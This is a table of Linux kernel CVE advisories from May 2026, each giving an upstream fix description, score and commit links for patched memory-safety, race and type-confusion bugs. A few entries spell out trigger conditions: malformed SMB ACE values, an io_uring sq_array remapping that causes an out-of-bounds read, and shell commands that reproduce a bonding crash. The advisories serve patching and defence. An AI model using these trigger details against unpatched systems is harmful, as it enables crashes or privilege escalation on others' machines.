| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: net: ipa: fix event ring index not programmed for IPA v5.0+ For IPA v5.0+, the event ring index field moved from CH_C_CNTXT_0 to CH_C_CNTXT_1. The v5.0 register definition intended to define this field in the CH_C_CNTXT_1 fmask array but used the old identifier of ERINDEX instead of CH_ERINDEX. Without a valid event ring, GSI channels could never signal transfer completions. This caused gsi_channel_trans_quiesce() to block forever in wait_for_completion(). At least for IPA v5.2 this resolves an issue seen where runtime suspend, system suspend, and remoteproc stop all hung forever. It also meant the IPA data path was completely non-functional. | 2026-05-08 | 7.5 | CVE-2026-43345 | https://git.kernel.org/stable/c/ae8343a19ccb051d519dbb3a9082ddea9f0551d3 https://git.kernel.org/stable/c/2bf18b643c4656413f7cfd5615af60a6b4e261da https://git.kernel.org/stable/c/2d2dc166d55148cfcf8ae67b415f8d6d110e6fca https://git.kernel.org/stable/c/34c988bb04cbdf093d2134e179433da49ffcd044 https://git.kernel.org/stable/c/56007972c0b1e783ca714d6f1f4d6e66e531d21f |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: arm64: dts: qcom: monaco: Reserve full Gunyah metadata region We observe spurious "Synchronous External Abort" exceptions (ESR=0x96000010) and kernel crashes on Monaco-based platforms. These faults are caused by the kernel inadvertently accessing hypervisor-owned memory that is not properly marked as reserved. From the boot log, the Qualcomm hypervisor reports the memory range at 0x91a80000 of size 0x80000 (512 KiB) as hypervisor-owned: qhee_hyp_assign_remove_memory: 0x91a80000/0x80000 -> ret 0 However, the EFI memory map provided by firmware only reserves the subrange 0x91a40000-0x91a87fff (288 KiB). The remaining portion (0x91a88000-0x91afffff) is incorrectly reported as conventional memory (from efi debug): efi: 0x000091a40000-0x000091a87fff [Reserved...] efi: 0x000091a88000-0x0000938fffff [Conventional...] As a result, the allocator may hand out PFNs inside the hypervisor-owned region, causing fatal aborts when the kernel accesses those addresses. Add a reserved-memory carveout for the Gunyah hypervisor metadata at 0x91a80000 (512 KiB) and mark it as no-map so Linux does not map or allocate from this area. For the record: Hyp version: gunyah-e78adb36e debug (2025-11-17 05:38:05 UTC) UEFI Ver: 6.0.260122.BOOT.MXF.1.0.c1-00449-KODIAKLA-1 | 2026-05-08 | 7.5 | CVE-2026-43347 | https://git.kernel.org/stable/c/edde62571f7602d83243ca51729ce42d22ea04d2 https://git.kernel.org/stable/c/59bd9088336d2bb7e713dcf4df5cbda86bb3c611 https://git.kernel.org/stable/c/85d98669fa7f1d3041d962515e45ee6e392db6f8 |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: smb: client: require a full NFS mode SID before reading mode bits parse_dacl() treats an ACE SID matching sid_unix_NFS_mode as an NFS mode SID and reads sid.sub_auth[2] to recover the mode bits. That assumes the ACE carries three subauthorities, but compare_sids() only compares min(a, b) subauthorities. A malicious server can return an ACE with num_subauth = 2 and sub_auth[] = {88, 3}, which still matches sid_unix_NFS_mode and then drives the sub_auth[2] read four bytes past the end of the ACE. Require num_subauth >= 3 before treating the ACE as an NFS mode SID. This keeps the fix local to the special-SID mode path without changing compare_sids() semantics for the rest of cifsacl. | 2026-05-08 | 7.6 | CVE-2026-43350 | https://git.kernel.org/stable/c/b53b8e98c23310294fc45fc686db5ee860311896 https://git.kernel.org/stable/c/c8eef12af1cc73031639ea7cf16e0b10e2536b0b https://git.kernel.org/stable/c/38a69f08ee82c450d3e4168707fff2e317dc3ff7 https://git.kernel.org/stable/c/f8488c07bea2431ee12a6067d736578064fa46b4 https://git.kernel.org/stable/c/2757ad3e4b6f9e0fed4c7739594e702abc5cab21 |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: i3c: mipi-i3c-hci: Correct RING_CTRL_ABORT handling in DMA dequeue The logic used to abort the DMA ring contains several flaws: 1. The driver unconditionally issues a ring abort even when the ring has already stopped. 2. The completion used to wait for abort completion is never re-initialized, resulting in incorrect wait behavior. 3. The abort sequence unintentionally clears RING_CTRL_ENABLE, which resets hardware ring pointers and disrupts the controller state. 4. If the ring is already stopped, the abort operation should be considered successful without attempting further action. Fix the abort handling by checking whether the ring is running before issuing an abort, re-initializing the completion when needed, ensuring that RING_CTRL_ENABLE remains asserted during abort, and treating an already stopped ring as a successful condition. | 2026-05-08 | 7.8 | CVE-2026-43352 | https://git.kernel.org/stable/c/003df94bcc9227e8e930abd03ac7f63ac10033dc https://git.kernel.org/stable/c/5549611888f5ca2db5e8e692b57f30626ddf9898 https://git.kernel.org/stable/c/b795e68bf3073d67bebbb5a44d93f49efc5b8cc7 |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: i3c: mipi-i3c-hci: Fix race in DMA ring dequeue The HCI DMA dequeue path (hci_dma_dequeue_xfer()) may be invoked for multiple transfers that timeout around the same time. However, the function is not serialized and can race with itself. When a timeout occurs, hci_dma_dequeue_xfer() stops the ring, processes incomplete transfers, and then restarts the ring. If another timeout triggers a parallel call into the same function, the two instances may interfere with each other - stopping or restarting the ring at unexpected times. Add a mutex so that hci_dma_dequeue_xfer() is serialized with respect to itself. | 2026-05-08 | 7.8 | CVE-2026-43353 | https://git.kernel.org/stable/c/b684b420a5bb0ea1b0e13abfdb8ce41c5266e62e https://git.kernel.org/stable/c/4faa1e9c67a2229f6749190aedaf88ce0391efd2 https://git.kernel.org/stable/c/1dca8aee80eea76d2aae21265de5dd64f6ba0f09 |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: io_uring/kbuf: check if target buffer list is still legacy on recycle There's a gap between when the buffer was grabbed and when it potentially gets recycled, where if the list is empty, someone could've upgraded it to a ring provided type. This can happen if the request is forced via io-wq. The legacy recycling is missing checking if the buffer_list still exists, and if it's of the correct type. Add those checks. | 2026-05-08 | 7.8 | CVE-2026-43366 | https://git.kernel.org/stable/c/a7b33671e418fca507feebd1d56e7f4952a4b25c https://git.kernel.org/stable/c/439a6728ec4641ffad1ca796622c19bc525e570f https://git.kernel.org/stable/c/f3fb54e7a8b4aadcc2836ee463eec8c88709b8aa https://git.kernel.org/stable/c/50ad880db3013c6fee0ef13781762a39e2e7ef83 https://git.kernel.org/stable/c/97b57f69fee1b61b41acbf37e7720cac9d389fa4 https://git.kernel.org/stable/c/c2c185be5c85d37215397c8e8781abf0a69bec1f |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: drm/i915: Fix potential overflow of shmem scatterlist length When a scatterlist table of a GEM shmem object of size 4 GB or more is populated with pages allocated from a folio, the unsigned int .length attribute of a scatterlist may get overflowed if the total byte length of pages allocated to that single scatterlist happens to reach or cross the 4GB limit. As a consequence, users of the object may suffer from hitting an unexpected, premature end of the object's backing pages. [278.780187] ------------[ cut here ]------------ [278.780377] WARNING: CPU: 1 PID: 2326 at drivers/gpu/drm/i915/i915_mm.c:55 remap_sg+0x199/0x1d0 [i915] ... [278.780654] CPU: 1 UID: 0 PID: 2326 Comm: gem_mmap_offset Tainted: G S U 6.17.0-rc1-CI_DRM_16981-ged823aaa0607+ #1 PREEMPT(voluntary) [278.780656] Tainted: [S]=CPU_OUT_OF_SPEC, [U]=USER [278.780658] Hardware name: Intel Corporation Meteor Lake Client Platform/MTL-P LP5x T3 RVP, BIOS MTLPFWI1.R00.3471.D91.2401310918 01/31/2024 [278.780659] RIP: 0010:remap_sg+0x199/0x1d0 [i915] ... [278.780786] Call Trace: [278.780787] <TASK> [278.780788] ? __apply_to_page_range+0x3e6/0x910 [278.780795] ? __pfx_remap_sg+0x10/0x10 [i915] [278.780906] apply_to_page_range+0x14/0x30 [278.780908] remap_io_sg+0x14d/0x260 [i915] [278.781013] vm_fault_cpu+0xd2/0x330 [i915] [278.781137] __do_fault+0x3a/0x1b0 [278.781140] do_fault+0x322/0x640 [278.781143] __handle_mm_fault+0x938/0xfd0 [278.781150] handle_mm_fault+0x12c/0x300 [278.781152] ? lock_mm_and_find_vma+0x4b/0x760 [278.781155] do_user_addr_fault+0x2d6/0x8e0 [278.781160] exc_page_fault+0x96/0x2c0 [278.781165] asm_exc_page_fault+0x27/0x30 ... That issue was apprehended by the author of a change that introduced it, and the potential risk was even annotated with a comment, but then never addressed. When adding folio pages to a scatterlist table, take care that the byte length of any single scatterlist does not exceed max_segment. (cherry picked from commit 06249b4e691a75694c014a61708c007fb5755f60) | 2026-05-08 | 7.8 | CVE-2026-43368 | https://git.kernel.org/stable/c/aeb7255531ba4a5c3a64938577170d08b78de399 https://git.kernel.org/stable/c/1c956f0fccc26fefcbb507516c49d1db41c40471 https://git.kernel.org/stable/c/eae4bf4107571283031db96ce132e951615e2ae4 https://git.kernel.org/stable/c/21a301f12d18797bf889c15497f922edfdaece3a https://git.kernel.org/stable/c/029ae067431ab9d0fca479bdabe780fa436706ea |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: drm/amdgpu: Fix use-after-free race in VM acquire Replace non-atomic vm->process_info assignment with cmpxchg() to prevent race when parent/child processes sharing a drm_file both try to acquire the same VM after fork(). (cherry picked from commit c7c573275ec20db05be769288a3e3bb2250ec618) | 2026-05-08 | 7.8 | CVE-2026-43370 | https://git.kernel.org/stable/c/ae87aea330c24f462fc7058ed543ba8bc6798447 https://git.kernel.org/stable/c/46d309996bd9251792d7dafdbaf615cf202b4447 https://git.kernel.org/stable/c/e61e355cbe49e585097eee28c15b862bfb1c0668 https://git.kernel.org/stable/c/c658c1c85ec235b7ecfbf8dbfee385b1332088f4 https://git.kernel.org/stable/c/904025fa8bba1d028adade33346372b4ac1a9249 https://git.kernel.org/stable/c/7885eb335d8f9e9942925d57e300a85e3f82ded4 https://git.kernel.org/stable/c/94b7782d0c8024f5b88454241c8d4777076c3786 https://git.kernel.org/stable/c/2c1030f2e84885cc58bffef6af67d5b9d2e7098f |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: net: ncsi: fix skb leak in error paths Early return paths in NCSI RX and AEN handlers fail to release the received skb, resulting in a memory leak. Specifically, ncsi_aen_handler() returns on invalid AEN packets without consuming the skb. Similarly, ncsi_rcv_rsp() exits early when failing to resolve the NCSI device, response handler, or request, leaving the skb unfreed. | 2026-05-08 | 7.5 | CVE-2026-43373 | https://git.kernel.org/stable/c/9891d7f4f1ede473c54b49776ae07755083eef06 https://git.kernel.org/stable/c/fef5aa6e3bcf3c8053307642663a63b7362d7552 https://git.kernel.org/stable/c/81d6aee32f8f7bbc175c05dbf61f4430bfb88c4a https://git.kernel.org/stable/c/59962588197863d0d746879f193905c0c6b3df49 https://git.kernel.org/stable/c/553366c271479c0d571dd1bb5d1bcde4747fb82e https://git.kernel.org/stable/c/b70c4e5e711931cdd56e6e905737b72f1e649189 https://git.kernel.org/stable/c/87138dde2d6937b12b967f28fe598a7d59000ae4 https://git.kernel.org/stable/c/5c3398a54266541610c8d0a7082e654e9ff3e259 |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: net: nexthop: fix percpu use-after-free in remove_nh_grp_entry When removing a nexthop from a group, remove_nh_grp_entry() publishes the new group via rcu_assign_pointer() then immediately frees the removed entry's percpu stats with free_percpu(). However, the synchronize_net() grace period in the caller remove_nexthop_from_groups() runs after the free. RCU readers that entered before the publish still see the old group and can dereference the freed stats via nh_grp_entry_stats_inc() -> get_cpu_ptr(nhge->stats), causing a use-after-free on percpu memory. Fix by deferring the free_percpu() until after synchronize_net() in the caller. Removed entries are chained via nh_list onto a local deferred free list. After the grace period completes and all RCU readers have finished, the percpu stats are safely freed. | 2026-05-08 | 7.8 | CVE-2026-43374 | https://git.kernel.org/stable/c/abf4feaee6405f1441929c6ebe7a250f2cd170a7 https://git.kernel.org/stable/c/ab5ebab9664214ba41a7633cb4e72f128204f924 https://git.kernel.org/stable/c/9e08ad731862b22a87cc55f752e16d66cdc9e231 https://git.kernel.org/stable/c/b2662e7593e94ae09b1cf7ee5f09160a3612bcb2 |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: net: Fix rcu_tasks stall in threaded busypoll I was debugging a NIC driver when I noticed that when I enable threaded busypoll, bpftrace hangs when starting up. dmesg showed: rcu_tasks_wait_gp: rcu_tasks grace period number 85 (since boot) is 10658 jiffies old. rcu_tasks_wait_gp: rcu_tasks grace period number 85 (since boot) is 40793 jiffies old. rcu_tasks_wait_gp: rcu_tasks grace period number 85 (since boot) is 131273 jiffies old. rcu_tasks_wait_gp: rcu_tasks grace period number 85 (since boot) is 402058 jiffies old. INFO: rcu_tasks detected stalls on tasks: 00000000769f52cd: .N nvcsw: 2/2 holdout: 1 idle_cpu: -1/64 task:napi/eth2-8265 state:R running task stack:0 pid:48300 tgid:48300 ppid:2 task_flags:0x208040 flags:0x00004000 Call Trace: <TASK> ? napi_threaded_poll_loop+0x27c/0x2c0 ? __pfx_napi_threaded_poll+0x10/0x10 ? napi_threaded_poll+0x26/0x80 ? kthread+0xfa/0x240 ? __pfx_kthread+0x10/0x10 ? ret_from_fork+0x31/0x50 ? __pfx_kthread+0x10/0x10 ? ret_from_fork_asm+0x1a/0x30 </TASK> The cause is that in threaded busypoll, the main loop is in napi_threaded_poll rather than napi_threaded_poll_loop, where the latter rarely iterates more than once within its loop. For rcu_softirq_qs_periodic inside napi_threaded_poll_loop to report its qs state, the last_qs must be 100ms behind, and this can't happen because napi_threaded_poll_loop rarely iterates in threaded busypoll, and each time napi_threaded_poll_loop is called last_qs is reset to the latest jiffies. This patch changes things so that in threaded busypoll, last_qs is saved in the outer napi_threaded_poll, and whether busy_poll_last_qs is NULL indicates whether napi_threaded_poll_loop is called for busypoll. This way last_qs would not reset to the latest jiffies on each invocation of napi_threaded_poll_loop. | 2026-05-08 | 7.5 | CVE-2026-43385 | https://git.kernel.org/stable/c/52459201d0df3fdbb1d281738b7b772e2cacb49c https://git.kernel.org/stable/c/1a86a1f7d88996085934139fa4c063b6299a2dd3 |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: libceph: Use u32 for non-negative values in ceph_monmap_decode() This patch fixes unnecessary implicit conversions that change signedness of blob_len and num_mon in ceph_monmap_decode(). Currently blob_len and num_mon are (signed) int variables. They are used to hold values that are always non-negative and get assigned in ceph_decode_32_safe(), which is meant to assign u32 values. Both variables are subsequently used as unsigned values, and the value of num_mon is further assigned to monmap->num_mon, which is of type u32. Therefore, both variables should be of type u32. This is especially relevant for num_mon. If the value read from the incoming message is very large, it is interpreted as a negative value, and the check for num_mon > CEPH_MAX_MON does not catch it. This leads to the attempt to allocate a very large chunk of memory for monmap, which will most likely fail. In this case, an unnecessary attempt to allocate memory is performed, and -ENOMEM is returned instead of -EINVAL. | 2026-05-08 | 7.5 | CVE-2026-43405 | https://git.kernel.org/stable/c/ee5588e2bc41acb73f6676c0520420c107cd0140 https://git.kernel.org/stable/c/86f7060cd638d6eb042e8ed780fb83a59ca0dcb3 https://git.kernel.org/stable/c/5f2806684b05bd24d05c091083b8e2517ba8ffac https://git.kernel.org/stable/c/b268984ae88cb0dcd7a8e8263962c748448e26e8 https://git.kernel.org/stable/c/ba0a4df8c563536857dcbf7b4dbd0f2a15f57ace https://git.kernel.org/stable/c/08bc6173fd611ad5a40f472bf5f15b92aea0fe40 https://git.kernel.org/stable/c/770444611f047dbfd4517ec0bc1b179d40c2f346 |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: ceph: add a bunch of missing ceph_path_info initializers ceph_mdsc_build_path() must be called with a zero-initialized ceph_path_info parameter, or else the following ceph_mdsc_free_path_info() may crash. Example crash (on Linux 6.18.12): virt_to_cache: Object is not a Slab page! WARNING: CPU: 184 PID: 2871736 at mm/slub.c:6732 kmem_cache_free+0x316/0x400 [...] Call Trace: [...] ceph_open+0x13d/0x3e0 do_dentry_open+0x134/0x480 vfs_open+0x2a/0xe0 path_openat+0x9a3/0x1160 [...] cache_from_obj: Wrong slab cache. names_cache but object is from ceph_inode_info WARNING: CPU: 184 PID: 2871736 at mm/slub.c:6746 kmem_cache_free+0x2dd/0x400 [...] kernel BUG at mm/slub.c:634! Oops: invalid opcode: 0000 [#1] SMP NOPTI RIP: 0010:__slab_free+0x1a4/0x350 Some of the ceph_mdsc_build_path() callers had initializers, but others had not, even though they were all added by commit 15f519e9f883 ("ceph: fix race condition validating r_parent before applying state"). The ones without an initializer are susceptible to random crashes. (I can imagine it could even be possible to exploit this bug to elevate privileges.) Unfortunately, these Ceph functions are undocumented and their semantics can only be derived from the code. I see that ceph_mdsc_build_path() initializes the structure only on success, but not on error. Calling ceph_mdsc_free_path_info() after a failed ceph_mdsc_build_path() call does not even make sense, but that's what all callers do, and for it to be safe, the structure must be zero-initialized. The least intrusive approach to fix this is therefore to add initializers everywhere. | 2026-05-08 | 7.8 | CVE-2026-43408 | https://git.kernel.org/stable/c/644b47f0574fd82aeb9d00317eca8d1f2a525c8c https://git.kernel.org/stable/c/8be8911f590813e6f90bc6407ced1b23e50bc5da https://git.kernel.org/stable/c/453df1f4535842bf17ff1885a225e153d7ee3374 https://git.kernel.org/stable/c/43323a5934b660afae687e8e4e95ac328615a5c4 |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: rust_binder: avoid reading the written value in offsets array When sending a transaction, its offsets array is first copied into the target proc's vma, and then the values are read back from there. This is normally fine because the vma is a read-only mapping, so the target process cannot change the value under us. However, if the target process somehow gains the ability to write to its own vma, it could change the offset before it's read back, causing the kernel to misinterpret what the sender meant. If the sender happens to send a payload with a specific shape, this could in the worst case lead to the receiver being able to privilege escalate into the sender. The intent is that gaining the ability to change the read-only vma of your own process should not be exploitable, so remove this TOCTOU read even though it's unexploitable without another Binder bug. | 2026-05-08 | 7.8 | CVE-2026-43433 | https://git.kernel.org/stable/c/e19afb53f7723b3bd22224f2b0c7dcfa70bb973f https://git.kernel.org/stable/c/3672141c93b7a0c0132bf5d5021a4b7f1d663aaa https://git.kernel.org/stable/c/4cb9e13fec0de7c942f5f927469beb8e48ddd20f |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: rust_binder: check ownership before using vma When installing missing pages (or zapping them), Rust Binder will look up the vma in the mm by address, and then call vm_insert_page (or zap_page_range_single). However, if the vma is closed and replaced with a different vma at the same address, this can lead to Rust Binder installing pages into the wrong vma. By installing the page into a writable vma, it becomes possible to write to your own binder pages, which are normally read-only. Although you're not supposed to be able to write to those pages, the intent behind the design of Rust Binder is that even if you get that ability, it should not lead to anything bad. Unfortunately, due to another bug, that is not the case. To fix this, store a pointer in vm_private_data and check that the vma returned by vma_lookup() has the right vm_ops and vm_private_data before trying to use the vma. This should ensure that Rust Binder will refuse to interact with any other VMA. The plan is to introduce more vma abstractions to avoid this unsafe access to vm_ops and vm_private_data, but for now let's start with the simplest possible fix. C Binder performs the same check in a slightly different way: it provides a vm_ops->close that sets a boolean to true, then checks that boolean after calling vma_lookup(), but this is more fragile than the solution in this patch. (We probably still want to do both, but the vm_ops->close callback will be added later as part of the follow-up vma API changes.) It's still possible to remap the vma so that pages appear in the right vma, but at the wrong offset, but this is a separate issue and will be fixed when Rust Binder gets a vm_ops->close callback. | 2026-05-08 | 7.8 | CVE-2026-43434 | https://git.kernel.org/stable/c/20a01f20d1f4064d90a8627aa41b5987f0220bb9 https://git.kernel.org/stable/c/5a472d04fb4b9115fb7d1535bd885cea450f14db https://git.kernel.org/stable/c/8ef2c15aeae07647f530d30f6daaf79eb801bcd1 |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: ALSA: pcm: fix use-after-free on linked stream runtime in snd_pcm_drain() In the drain loop, the local variable 'runtime' is reassigned to a linked stream's runtime (runtime = s->runtime at line 2157). After releasing the stream lock at line 2169, the code accesses runtime->no_period_wakeup, runtime->rate, and runtime->buffer_size (lines 2170-2178) - all referencing the linked stream's runtime without any lock or refcount protecting its lifetime. A concurrent close() on the linked stream's fd triggers snd_pcm_release_substream() → snd_pcm_drop() → pcm_release_private() → snd_pcm_unlink() → snd_pcm_detach_substream() → kfree(runtime). No synchronization prevents kfree(runtime) from completing while the drain path dereferences the stale pointer. Fix by caching the needed runtime fields (no_period_wakeup, rate, buffer_size) into local variables while still holding the stream lock, and using the cached values after the lock is released. | 2026-05-08 | 7.8 | CVE-2026-43437 | https://git.kernel.org/stable/c/9baee36e8c5443411c4629afabafaff8a46a23fd https://git.kernel.org/stable/c/fc71f888994569f87d5bee20b1ac6c9c1e3a7a79 https://git.kernel.org/stable/c/629cf09464cf98670996ea5c191dc9743e6f3f00 https://git.kernel.org/stable/c/ae8f8d30d334bad5b1b3cdb1eb8a0b771f55e432 https://git.kernel.org/stable/c/4a758e9a1f5ed722f83c4dd35f867fe811553bcb https://git.kernel.org/stable/c/c2f64e05a0587a83ec42dbd6b7a7ded79b2ff694 https://git.kernel.org/stable/c/9b1dbd69ba6f8f8c69bc7b77c2ce3b9c6ed05ba6 |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: sched_ext: Remove redundant css_put() in scx_cgroup_init() The iterator css_for_each_descendant_pre() walks the cgroup hierarchy under cgroup_lock(). It does not increment the reference counts on yielded css structs. According to the cgroup documentation, css_put() should only be used to release a reference obtained via css_get() or css_tryget_online(). Since the iterator does not use either of these to acquire a reference, calling css_put() in the error path of scx_cgroup_init() causes a refcount underflow. Remove the unbalanced css_put() to prevent a potential Use-After-Free (UAF) vulnerability. | 2026-05-08 | 7.8 | CVE-2026-43438 | https://git.kernel.org/stable/c/cc095cd305fddbe25a968e4a78436ff9476cf0f6 https://git.kernel.org/stable/c/6eaaa67d6998f6c30c462b140db8c062e07ec473 https://git.kernel.org/stable/c/bf50f3285eda8a0173625fcdb5f183f96e1008cd https://git.kernel.org/stable/c/1336b579f6079fb8520be03624fcd9ba443c930b |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: net: bonding: Fix nd_tbl NULL dereference when IPv6 is disabled When booting with the 'ipv6.disable=1' parameter, the nd_tbl is never initialized because inet6_init() exits before ndisc_init() is called, which initializes it. If bonding ARP/NS validation is enabled, an IPv6 NS/NA packet received on a slave can reach bond_validate_na(), which calls bond_has_this_ip6(). That path calls ipv6_chk_addr() and can crash in __ipv6_chk_addr_and_flags(). BUG: kernel NULL pointer dereference, address: 00000000000005d8 Oops: Oops: 0000 [#1] SMP NOPTI RIP: 0010:__ipv6_chk_addr_and_flags+0x69/0x170 Call Trace: <IRQ> ipv6_chk_addr+0x1f/0x30 bond_validate_na+0x12e/0x1d0 [bonding] ? __pfx_bond_handle_frame+0x10/0x10 [bonding] bond_rcv_validate+0x1a0/0x450 [bonding] bond_handle_frame+0x5e/0x290 [bonding] ? srso_alias_return_thunk+0x5/0xfbef5 __netif_receive_skb_core.constprop.0+0x3e8/0xe50 ? srso_alias_return_thunk+0x5/0xfbef5 ? update_cfs_rq_load_avg+0x1a/0x240 ? srso_alias_return_thunk+0x5/0xfbef5 ? __enqueue_entity+0x5e/0x240 __netif_receive_skb_one_core+0x39/0xa0 process_backlog+0x9c/0x150 __napi_poll+0x30/0x200 ? srso_alias_return_thunk+0x5/0xfbef5 net_rx_action+0x338/0x3b0 handle_softirqs+0xc9/0x2a0 do_softirq+0x42/0x60 </IRQ> <TASK> __local_bh_enable_ip+0x62/0x70 __dev_queue_xmit+0x2d3/0x1000 ? srso_alias_return_thunk+0x5/0xfbef5 ? srso_alias_return_thunk+0x5/0xfbef5 ? packet_parse_headers+0x10a/0x1a0 packet_sendmsg+0x10da/0x1700 ? kick_pool+0x5f/0x140 ? srso_alias_return_thunk+0x5/0xfbef5 ? __queue_work+0x12d/0x4f0 __sys_sendto+0x1f3/0x220 __x64_sys_sendto+0x24/0x30 do_syscall_64+0x101/0xf80 ? exc_page_fault+0x6e/0x170 ? srso_alias_return_thunk+0x5/0xfbef5 entry_SYSCALL_64_after_hwframe+0x77/0x7f </TASK> Fix this by checking ipv6_mod_enabled() before dispatching IPv6 packets to bond_na_rcv(). If IPv6 is disabled, return early from bond_rcv_validate() and avoid the path to ipv6_chk_addr(). | 2026-05-08 | 7.5 | CVE-2026-43441 | https://git.kernel.org/stable/c/49dbfcb70eca5f6f9043594e1e323c74c39e3863 https://git.kernel.org/stable/c/cf6099ef493b94e140b0fad52482a78853115318 https://git.kernel.org/stable/c/c78f01abe535853f13f0b26cd5b1d2f19bf52e2f https://git.kernel.org/stable/c/95faa1459b83fa544191e82ccc73856f03b7741f https://git.kernel.org/stable/c/c9c238066fb254dabf65e27379f93c56112c5b96 https://git.kernel.org/stable/c/30021e969d48e5819d5ae56936c2f34c0f7ce997 |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: io_uring: fix physical SQE bounds check for SQE_MIXED 128-byte ops When IORING_SETUP_SQE_MIXED is used without IORING_SETUP_NO_SQARRAY, the boundary check for 128-byte SQE operations in io_init_req() validated the logical SQ head position rather than the physical SQE index. The existing check: !(ctx->cached_sq_head & (ctx->sq_entries - 1)) ensures the logical position isn't at the end of the ring, which is correct for NO_SQARRAY rings where physical == logical. However, when sq_array is present, an unprivileged user can remap any logical position to an arbitrary physical index via sq_array. Setting sq_array[N] = sq_entries - 1 places a 128-byte operation at the last physical SQE slot, causing the 128-byte memcpy in io_uring_cmd_sqe_copy() to read 64 bytes past the end of the SQE array. Replace the cached_sq_head alignment check with a direct validation of the physical SQE index, which correctly handles both sq_array and NO_SQARRAY cases. | 2026-05-08 | 7.1 | CVE-2026-43442 | https://git.kernel.org/stable/c/1f794f9bed3e5cf7250a3b4daf112a72ed1513e9 https://git.kernel.org/stable/c/6f02c6b196036dbb6defb4647d8707d29b7fe95b |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: iavf: fix PTP use-after-free during reset Commit 7c01dbfc8a1c5f ("iavf: periodically cache PHC time") introduced a worker to cache PHC time, but failed to stop it during reset or disable. This creates a race condition where `iavf_reset_task()` or `iavf_disable_vf()` free adapter resources (AQ) while the worker is still running. If the worker triggers `iavf_queue_ptp_cmd()` during teardown, it accesses freed memory/locks, leading to a crash. Fix this by calling `iavf_ptp_release()` before tearing down the adapter. This ensures `ptp_clock_unregister()` synchronously cancels the worker and cleans up the chardev before the backing resources are destroyed. | 2026-05-08 | 7.8 | CVE-2026-43447 | https://git.kernel.org/stable/c/1b034f2429ce6b45ce74dc266175d277acafc5c4 https://git.kernel.org/stable/c/90cc8b2add29b57288025b51c70bc647e7cccb12 https://git.kernel.org/stable/c/efc54fb13d79117a825fef17364315a58682c7ec |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: netfilter: nf_tables: Fix for duplicate device in netdev hooks When handling NETDEV_REGISTER notification, duplicate device registration must be avoided since the device may have been added by nft_netdev_hook_alloc() already when creating the hook. | 2026-05-08 | 7.8 | CVE-2026-43454 | https://git.kernel.org/stable/c/6d2a95c6890577cc3eab2b20018e16850d7fb094 https://git.kernel.org/stable/c/2041cdb078041611510fc189410bc70b29f688fb https://git.kernel.org/stable/c/b7cdc5a97d02c943f4bdde4d5767ad0c13cad92b |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: bonding: fix type confusion in bond_setup_by_slave() kernel BUG at net/core/skbuff.c:2306! Oops: invalid opcode: 0000 [#1] SMP KASAN NOPTI RIP: 0010:pskb_expand_head+0xa08/0xfe0 net/core/skbuff.c:2306 RSP: 0018:ffffc90004aff760 EFLAGS: 00010293 RAX: 0000000000000000 RBX: ffff88807e3c8780 RCX: ffffffff89593e0e RDX: ffff88807b7c4900 RSI: ffffffff89594747 RDI: ffff88807b7c4900 RBP: 0000000000000820 R08: 0000000000000005 R09: 0000000000000000 R10: 00000000961a63e0 R11: 0000000000000000 R12: ffff88807e3c8780 R13: 00000000961a6560 R14: dffffc0000000000 R15: 00000000961a63e0 CS: 0010 DS: 0000 ES: 0000 CR0: 0000000080050033 CR2: 00007fe1a0ed8df0 CR3: 000000002d816000 CR4: 00000000003526f0 Call Trace: <TASK> ipgre_header+0xdd/0x540 net/ipv4/ip_gre.c:900 dev_hard_header include/linux/netdevice.h:3439 [inline] packet_snd net/packet/af_packet.c:3028 [inline] packet_sendmsg+0x3ae5/0x53c0 net/packet/af_packet.c:3108 sock_sendmsg_nosec net/socket.c:727 [inline] __sock_sendmsg net/socket.c:742 [inline] ____sys_sendmsg+0xa54/0xc30 net/socket.c:2592 ___sys_sendmsg+0x190/0x1e0 net/socket.c:2646 __sys_sendmsg+0x170/0x220 net/socket.c:2678 do_syscall_x64 arch/x86/entry/syscall_64.c:63 [inline] do_syscall_64+0x106/0xf80 arch/x86/entry/syscall_64.c:94 entry_SYSCALL_64_after_hwframe+0x77/0x7f RIP: 0033:0x7fe1a0e6c1a9 When a non-Ethernet device (e.g. GRE tunnel) is enslaved to a bond, bond_setup_by_slave() directly copies the slave's header_ops to the bond device: bond_dev->header_ops = slave_dev->header_ops; This causes a type confusion when dev_hard_header() is later called on the bond device. Functions like ipgre_header(), ip6gre_header(), all use netdev_priv(dev) to access their device-specific private data. When called with the bond device, netdev_priv() returns the bond's private data (struct bonding) instead of the expected type (e.g. struct ip_tunnel), leading to garbage values being read and kernel crashes. Fix this by introducing bond_header_ops with wrapper functions that delegate to the active slave's header_ops using the slave's own device. This ensures netdev_priv() in the slave's header functions always receives the correct device. The fix is placed in the bonding driver rather than individual device drivers, as the root cause is bond blindly inheriting header_ops from the slave without considering that these callbacks expect a specific netdev_priv() layout. The type confusion can be observed by adding a printk in ipgre_header() and running the following commands: ip link add dummy0 type dummy ip addr add 10.0.0.1/24 dev dummy0 ip link set dummy0 up ip link add gre1 type gre local 10.0.0.1 ip link add bond1 type bond mode active-backup ip link set gre1 master bond1 ip link set gre1 up ip link set bond1 up ip addr add fe80::1/64 dev bond1 | 2026-05-08 | 7.8 | CVE-2026-43456 | https://git.kernel.org/stable/c/9baf26a91565b7bb2b1d9f99aaf884a2b28c2f6d https://git.kernel.org/stable/c/6ac890f1d60ac3707ee8dae15a67d9a833e49956 